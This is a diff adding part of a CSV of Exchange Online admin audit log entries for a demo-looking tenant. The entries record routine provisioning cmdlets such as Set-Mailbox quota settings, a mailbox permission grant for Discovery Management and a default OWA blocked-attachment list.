+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""OMEncryptionStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:31:57Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""SupervisionTags"",
+    ""Value"": ""Reject;Allow""
+  }
+]"
+2020-05-02T11:33:12Z,,,Set-ExchangeAssistanceConfig,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""PrivacyStatementURL"",
+    ""Value"": ""http://go.microsoft.com/fwlink/?LinkID=259417""
+  },
+  {
+    ""Name"": ""PrivacyLinkDisplayEnabled"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-02T11:33:09Z,,,Add-MailboxPermission,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}""
+  },
+  {
+    ""Name"": ""User"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/Discovery Management""
+  },
+  {
+    ""Name"": ""AccessRights"",
+    ""Value"": ""FullAccess""
+  }
+]"
+2020-05-02T11:32:51Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:50Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:46Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:42Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:38Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:37Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:33Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:28Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}""
+  },
+  {
+    ""Name"": ""ShardRelevancyFeatureStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange""
+  }
+]"
+2020-05-02T11:32:23Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""UMGrammar"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""MaxSendSize"",
+    ""Value"": ""1 GB (1,073,741,824 bytes)""
+  },
+  {
+    ""Name"": ""MailRouting"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""MessageTracking"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OMEncryption"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OABGen"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ClientExtensions"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}""
+  },
+  {
+    ""Name"": ""GMGen"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SuiteServiceStorage"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-02T11:32:15Z,,,Set-OwaMailboxPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\OwaMailboxPolicy-Default""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""BlockedFileTypes"",
+    ""Value"": "".settingcontent-ms;.printerexport;.appcontent-ms;.appref-ms;.vsmacros;.website;.msh2xml;.msh1xml;.diagcab;.webpnp;.ps2xml;.ps1xml;.mshxml;.gadget;.theme;.psdm1;.mhtml;.cdxml;.xbap;.vhdx;.pyzw;.pssc;.psd1;.psc2;.psc1;.msh2;.msh1;.jnlp;.aspx;.appx;.xnk;.xll;.wsh;.wsf;.wsc;.wsb;.vsw;.vst;.vss;.vhd;.vbs;.vbp;.vbe;.url;.udl;.tmp;.shs;.shb;.sct;.scr;.scf;.reg;.pyz;.pyw;.pyo;.pyc;.pst;.ps2;.ps1;.prg;.prf;.plg;.pif;.pcd;.ops;.msu;.mst;.msp;.msi;.msh;.msc;.mht;.mdz;.mdw;.mdt;.mde;.mdb;.mda;.mcf;.maw;.mav;.mau;.mat;.mas;.mar;.maq;.mam;.mag;.maf;.mad;.lnk;.ksh;.jse;.jar;.its;.isp;.ins;.inf;.htc;.hta;.hpj;.hlp;.grp;.fxp;.exe;.der;.csh;.crt;.cpl;.com;.cnt;.cmd;.chm;.cer;.bat;.bas;.asx;.asp;.app;.apk;.adp;.ade;.ws;.vb;.py;.pl;.js""
+  }
+]"
+2020-05-02T11:31:55Z,,,New-ExchangeAssistanceConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-02T11:31:53Z,,,Enable-AddressListPaging,"[
+  {
+    ""Name"": ""DoNotUpdateRecipients"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T06:09:20Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:18Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:10Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:59Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:50Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:42Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""9 GB (9,663,676,416 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:31Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""Management"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
